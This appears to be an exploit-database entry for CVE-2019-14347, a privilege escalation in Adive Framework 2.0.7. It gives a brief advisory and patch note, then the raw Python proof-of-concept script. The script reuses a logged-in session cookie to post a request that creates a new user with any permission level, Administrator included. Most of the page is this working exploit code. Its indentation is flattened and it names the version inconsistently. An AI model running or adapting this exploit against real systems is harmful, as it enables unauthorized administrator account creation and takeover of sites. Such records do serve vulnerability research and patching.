Adive Framework 2.0.7 - Privilege Escalation

vendor:

Adive Framework

by:

Pablo Santiago

8.8

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Adive Framework

Affected Version From: 2.0.7

Affected Version To: 2.0.7

Patch Exists: YES

Related CWE: CVE-2019-14347

CPE: a:adive:adive_framework

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

Adive Framework 2.0.7 – Privilege Escalation

An attacker can exploit a vulnerability in Adive Framework 2.0.7 to gain elevated privileges. By sending a crafted request to the application, an attacker can create a new user with administrator privileges. This vulnerability is due to the lack of proper input validation and authentication checks. This allows an attacker to bypass authentication and gain elevated privileges.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Adive Framework.

Source

Exploit-DB raw data:

# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation
# Date: 2019-08-02
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows 10
# CVE : CVE-2019-14347

#Exploit

import requests
import sys

session = requests.Session()

http_proxy  = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"

proxyDict = {
             "http"  : http_proxy,
             "https" : https_proxy
           }
print('[*****************************************]')
print('[ BYPASSING Adive Framework Version.2.0.5 ]')
print('[*****************************************]''\n')



print('[+]Login with the correct credentials:' '\n')

user = input('[+]user:')
password = input('[+]password:')
print('\n')

url = 'http://localhost/adive/admin/login'
values = {'user': user,
          'password': password,
          }

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()['PHPSESSID']

print('Your session cookie is:'+ cookie +'\n')


host = sys.argv[1]
print('Create the new user:')
userName = input('[+]User:')
userUsername = input('[+]UserName:')
password = input('[+]Password:')
password2 = input('[+]Confirm Password:')
print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')
permission = input('[+]permission:')

if (password == password2):
#configure proxy burp

#hacer el request para la creacion de usuario
data = {
'userName':userName,
'userUsername':userUsername,
'pass':password,
'cpass':password2,
'permission':permission,

}

headers= {
'Cookie': 'PHPSESSID='+cookie
}

request = session.post(host+'/adive/admin/user/add', data=data,
headers=headers, proxies=proxyDict)
print('+--------------------------------------------------+')

else:
print ('Passwords dont match!!!')

#PoC
https://imgur.com/dUgLYi6
https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif